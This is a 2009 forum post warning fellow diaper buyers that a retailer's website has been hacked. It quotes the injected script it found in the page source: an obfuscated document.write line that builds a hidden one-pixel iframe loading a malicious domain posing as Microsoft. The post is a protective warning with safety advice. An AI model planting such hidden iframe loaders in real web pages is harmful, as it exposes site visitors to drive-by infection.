Just a quick FYI to everyone - dry247.com, makers & sellers of my favorite diaper, seems to have been hacked. Site still functions, but stopbadware.org has found that the site has embedded malicious code.
That's a quick snipped from their page source. It's an embedded inline frame 1 pixel wide by 2 pixels high that loads up a chinese attack site (there's a couple other sites it embeds, but I didn't feel like posting them), so avoid them. I haven't done any more poking around than just looking at their page source (haven't even checked on what it's downloading from microsotf.cn - no, that's not a type-o), but it's possible that their server is infected and intercepting credit card data as well.Code:document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');
I'll be checking on this every so often, but you can see updated results from stopbadware.org yourself here: Stopbadware.org - Report for www.dry247.com
Do not - repeat, DO NOT - visit dry247.com for any reason. If you absolutely have to, please use firefox and the noscript addon and deny script permission to dry247.com until they fix this problem. That will protect your computer from being compromised as well. Under no circumstances should you buy from their website, since nothing you do can protect you from that if their transaction system is indeed compromised. If you are desperate and have to buy some, their contact info is (copy & pasted from their website)
1425 37th street
Brooklyn, NY, 11218
This makes me sad, since they make my favorite diaper and was going to buy a case. I can wait a couple days while they clear this up, though.
Thanks to Technologic:
Google Safe Browsing diagnostic page for www.dry247.com < a link to the Google diagnostic page for Dry24/7's page. I should have posted this in the first place, thanks for catching it Technologic )
I've sent an email to them just to make sure they know.
**EDIT, Jul 28th 2009**
Their site is still down, no update as of yet as to when it will be back up. Why is it so few companies ever consider security or disaster recovery until it's too late?